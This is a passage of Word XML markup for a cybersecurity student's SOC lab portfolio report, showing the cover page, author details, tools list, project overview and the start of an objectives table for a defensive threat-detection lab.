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ECC91" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="576"/>
        <w:ind w:left="6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079771" wp14:editId="6E2B769A">
                <wp:extent cx="6461827" cy="1153161"/>
                <wp:effectExtent l="0" t="0" r="0" b="8890"/>
                <wp:docPr id="11887" name="Group 11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1827" cy="1153161"/>
                          <a:chOff x="0" y="0"/>
                          <a:chExt cx="6461827" cy="1153161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1722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 h="609600">
                                <a:moveTo>
                                  <a:pt x="76200" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6096000" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6138123" y="0"/>
                                  <a:pt x="6172200" y="34077"/>
                                  <a:pt x="6172200" y="76200"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6172200" y="533400"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6172200" y="575523"/>
                                  <a:pt x="6138123" y="609600"/>
                                  <a:pt x="6096000" y="609600"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="76200" y="609600"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="34077" y="609600"/>
                                  <a:pt x="0" y="575523"/>
                                  <a:pt x="0" y="5334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1B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1517485" y="130648"/>
                            <a:ext cx="4172516" cy="406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A650B" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRPr="007F7D8E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color w:val="000000" w:themeColor="text1"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="007F7D8E">
                                <w:rPr>
                                  <w:b/>
                                  <w:color w:val="000000" w:themeColor="text1"/>
                                  <w:sz w:val="52"/>
                                </w:rPr>
                                <w:t>SOC LAB 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746761"/>
                            <a:ext cx="61722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 h="406400">
                                <a:moveTo>
                                  <a:pt x="76200" y="0"/>
                                </a:moveTo>
                                <a:lnTo>
                                  <a:pt x="6096000" y="0"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6138123" y="0"/>
                                  <a:pt x="6172200" y="34077"/>
                                  <a:pt x="6172200" y="76200"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="6172200" y="330200"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="6172200" y="372323"/>
                                  <a:pt x="6138123" y="406400"/>
                                  <a:pt x="6096000" y="406400"/>
                                </a:cubicBezTo>
                                <a:lnTo>
                                  <a:pt x="76200" y="406400"/>
                                </a:lnTo>
                                <a:cubicBezTo>
                                  <a:pt x="34077" y="406400"/>
                                  <a:pt x="0" y="372323"/>
                                  <a:pt x="0" y="330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997858" y="862146"/>
                            <a:ext cx="5463969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F93AC" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRPr="007F7D8E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color w:val="auto"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="007F7D8E">
                                <w:rPr>
                                  <w:color w:val="auto"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>Automated Threat Detection &amp; Incident Response Simulation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079771" id="Group 11887" o:spid="_x0000_s1026" style="width:508.8pt;height:90.8pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="64618,11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">
                <v:shape id="Shape 7" o:spid="_x0000_s1027" style="position:absolute;width:61722;height:6096;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="61722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" path="m76200,l6096000,v42123,,76200,34077,76200,76200l6172200,533400v,42123,-34077,76200,-76200,76200l76200,609600c34077,609600,,575523,,533400l,76200c,34077,34077,,76200,xe" fillcolor="#0e2841 [3215]" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6172200,609600"/>
                </v:shape>
                <v:rect id="Rectangle 8" o:spid="_x0000_s1028" style="position:absolute;left:15174;top:1306;width:41726;height:4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49A650B" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRPr="007F7D8E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color w:val="000000" w:themeColor="text1"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="007F7D8E">
                          <w:rPr>
                            <w:b/>
                            <w:color w:val="000000" w:themeColor="text1"/>
                            <w:sz w:val="52"/>
                          </w:rPr>
                          <w:t>SOC LAB PROJECT</w:t>
                        </w:r>
                      </w:p>
                    </w:txbxContent>
                  </v:textbox>
                </v:rect>
                <v:shape id="Shape 10" o:spid="_x0000_s1029" style="position:absolute;top:7467;width:61722;height:4064;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="61722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" path="m76200,l6096000,v42123,,76200,34077,76200,76200l6172200,330200v,42123,-34077,76200,-76200,76200l76200,406400c34077,406400,,372323,,330200l,76200c,34077,34077,,76200,xe" fillcolor="#1a3a5c" stroked="f" strokeweight="0">
                  <v:stroke miterlimit="83231f" joinstyle="miter"/>
                  <v:path arrowok="t" textboxrect="0,0,6172200,406400"/>
                </v:shape>
                <v:rect id="Rectangle 11" o:spid="_x0000_s1030" style="position:absolute;left:9978;top:8621;width:54640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B0F93AC" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRPr="007F7D8E" w:rsidRDefault="00000000">
                        <w:pPr>
                          <w:spacing w:after="160"/>
                          <w:ind w:left="0" w:firstLine="0"/>
                          <w:jc w:val="left"/>
                          <w:rPr>
                            <w:color w:val="auto"/>
                          </w:rPr>
                        </w:pPr>
                        <w:r w:rsidRPr="007F7D8E">
                          <w:rPr>
                            <w:color w:val="auto"/>
                            <w:sz w:val="24"/>
                          </w:rPr>
                          <w:t>Automated Threat Detection &amp; Incident Response Simulation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9720" w:type="dxa"/>
        <w:tblInd w:w="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65"/>
        <w:gridCol w:w="7155"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="23924BAE" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="520"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="7ABABC0D" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="200" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1A3A5C"/>
              </w:rPr>
              <w:t>Author</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="68CD35B5" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="200" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Mohamed Sabry (0xSABRY)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="210E8ECD" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="520"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="3E6E0D68" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="200" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1A3A5C"/>
              </w:rPr>
              <w:t>Role</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
          </w:tcPr>
          <w:p w14:paraId="1F05154B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D1B1CBE" wp14:editId="0356AAF3">
                      <wp:extent cx="4526280" cy="330200"/>
                      <wp:effectExtent l="0" t="0" r="7620" b="0"/>
                      <wp:docPr id="11580" name="Group 115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26280" cy="330200"/>
                                <a:chOff x="0" y="0"/>
                                <a:chExt cx="4526280" cy="330200"/>
                              </a:xfrm>
                            </wpg:grpSpPr>
                            <wps:wsp>
                              <wps:cNvPr id="16476" name="Shape 16476"/>
                              <wps:cNvSpPr/>
                              <wps:spPr>
                                <a:xfrm>
                                  <a:off x="0" y="0"/>
                                  <a:ext cx="4526280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26280" h="330200">
                                      <a:moveTo>
                                        <a:pt x="0" y="0"/>
                                      </a:moveTo>
                                      <a:lnTo>
                                        <a:pt x="4526280" y="0"/>
                                      </a:lnTo>
                                      <a:lnTo>
                                        <a:pt x="4526280" y="33020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5F8F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127000" y="104242"/>
                                  <a:ext cx="1498739" cy="1562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CDBF60" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRPr="007F7D8E" w:rsidRDefault="00000000">
                                    <w:pPr>
                                      <w:spacing w:after="160"/>
                                      <w:ind w:left="0" w:firstLine="0"/>
                                      <w:jc w:val="left"/>
                                      <w:rPr>
                                        <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                        <w:sz w:val="24"/>
                                      </w:rPr>
                                    </w:pPr>
                                    <w:r w:rsidRPr="007F7D8E">
                                      <w:rPr>
                                        <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                        <w:sz w:val="24"/>
                                      </w:rPr>
                                      <w:t>SOC Analyst | DFIR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1B1CBE" id="Group 11580" o:spid="_x0000_s1031" style="width:356.4pt;height:26pt;mso-position-horizontal-relative:char;mso-position-vertical-relative:line" coordsize="45262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">
                      <v:shape id="Shape 16476" o:spid="_x0000_s1032" style="position:absolute;width:45262;height:3302;visibility:visible;mso-wrap-style:square;v-text-anchor:top" coordsize="452628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" path="m,l4526280,r,330200l,330200,,e" fillcolor="#f5f8fb" stroked="f" strokeweight="0">
                        <v:stroke miterlimit="83231f" joinstyle="miter"/>
                        <v:path arrowok="t" textboxrect="0,0,4526280,330200"/>
                      </v:shape>
                      <v:rect id="Rectangle 21" o:spid="_x0000_s1033" style="position:absolute;left:1270;top:1042;width:1498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      <v:textbox inset="0,0,0,0">
                          <w:txbxContent>
                            <w:p w14:paraId="50CDBF60" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRPr="007F7D8E" w:rsidRDefault="00000000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color w:val="FFFFFF" w:themeColor="background1"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                              </w:pPr>
                              <w:r w:rsidRPr="007F7D8E">
                                <w:rPr>
                                  <w:color w:val="FFFFFF" w:themeColor="background1"/>
                                  <w:sz w:val="24"/>
                                </w:rPr>
                                <w:t>SOC Analyst | DFIR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BA2BC0" w14:paraId="2429644F" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="520"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="46891CEC" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="200" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1A3A5C"/>
              </w:rPr>
              <w:t>Date</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="15276A65" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="200" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>March 2026</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="1D994D4A" w14:textId="77777777" w:rsidTr="007F7D8E">
        <w:trPr>
          <w:trHeight w:val="347"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="62F9E657" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="200" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:rPr>
                <w:b/>
                <w:color w:val="1A3A5C"/>
              </w:rPr>
              <w:t>Classification</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="280687ED" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="200" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t>Lab / Portfolio Project</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="5D527FA8" w14:textId="77777777" w:rsidTr="007F7D8E">
        <w:trPr>
          <w:trHeight w:val="337"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9720" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="0D1B2A"/>
          </w:tcPr>
          <w:p w14:paraId="1D36E095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22"/>
              </w:rPr>
              <w:t>Tools Used</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="0BF51B7B" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9720" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="40F82D78" w14:textId="4B3C34A1" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  •  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:t>Wazuh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve"> SIEM </w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="10D84EB1" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9720" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="552BEAB7" w14:textId="2FF4FC34" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  •  </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:proofErr w:type="gramStart"/>
            <w:r>
              <w:t>ThreatScope</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:t xml:space="preserve">  (</w:t>
            </w:r>
            <w:proofErr w:type="gramEnd"/>
            <w:r>
              <w:t>custom tool)</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="699907F6" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9720" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="554F9878" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  •  Hydra</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="7CA7DA01" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9720" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="2" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2ED35670" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  •  Ubuntu Server 24.04 LTS</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="54328575" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="9720" w:type="dxa"/>
            <w:gridSpan w:val="2"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="2" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F0F4F8"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="4E6357F7" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
            <w:pPr>
              <w:spacing w:after="0"/>
              <w:ind w:left="0" w:firstLine="0"/>
              <w:jc w:val="left"/>
            </w:pPr>
            <w:r>
              <w:t xml:space="preserve">  •  VirtualBox / VMware Workstation</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3136B478" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:pStyle w:val="1"/>
        <w:ind w:left="255"/>
      </w:pPr>
      <w:r>
        <w:t>1. PROJECT OVERVIEW</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AB626B4" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:spacing w:after="120" w:line="334" w:lineRule="auto"/>
        <w:ind w:left="-5" w:right="-15"/>
      </w:pPr>
      <w:r>
        <w:t>This project demonstrates the end-to-end workflow of a Security Operations Center (SOC) Tier 1 analyst — from attack simulation to detection, analysis, and response. The lab replicates a real-world monitored environment using open-source tools, a custom threat detection engine (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatScope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>), and a SIEM platform (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Wazuh</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58F78954" w14:textId="77777777" w:rsidR="00BA2BC0" w:rsidRDefault="00000000">
      <w:pPr>
        <w:ind w:left="-5" w:right="-15"/>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">Three distinct attack scenarios were executed against a live Ubuntu Server endpoint. Each scenario was detected, triaged, and mapped to the MITRE ATT&amp;CK framework. </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ThreatScope</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> was used to perform deep log analysis on Windows Event Logs captured during the attacks, producing STIX 2.1 threat intelligence bundles and JSON reports.</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="TableGrid"/>
        <w:tblW w:w="9720" w:type="dxa"/>
        <w:tblInd w:w="6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7128"/>
      </w:tblGrid>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="14828913" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="2B5C2F5D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w="7128" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:left w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="1A3A5C"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="0A91C015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BA2BC0" w14:paraId="77CD45CF" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6ED14E27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3A5C"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Detection Coverage</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="6EB02D78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 xml:space="preserve">Monitor endpoint activity using </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Wazuh</w:t>
            </w:r>
            <w:proofErr w:type="spellEnd"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t xml:space="preserve"> agent on Ubuntu Server</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00BA2BC0" w14:paraId="663DE4CA" w14:textId="77777777">
        <w:trPr>
          <w:trHeight w:val="480"/>
        </w:trPr>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="2592" w:type="dxa"/>
            <w:tcBorders>
              <w:top w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:left w:val="single" w:sz="8" w:space="0" w:color="C0D0E0"/>
              <w:bottom w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
              <w:right w:val="single" w:sz="4" w:space="0" w:color="DDE8F0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="E8EEF4"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="18FC01B9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3A5C"/>
                <w:sz w:val="18"/>
              </w:rPr>
              <w:t>Threat Analysis</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="7128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8" w:space="0" w:color="C0D0E0"/>
            </w:tcBorders>
            <w:shd w:val="clear" w:color="auto" w:fill="F5F8FB"/>
            <w:vAlign w:val="center"/>
          </w:tcPr>
          <w:p w14:paraId="16DAE2DD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 xml:space="preserve">Analyze Windows Event Logs with </w:t>
            </w:r>
            <w:proofErr w:type="spellStart"/>
            <w:r>
              <w:rPr>
                <w:color w:val="000000"/>
                <w:sz w:val="18"/>
              </w:rPr>
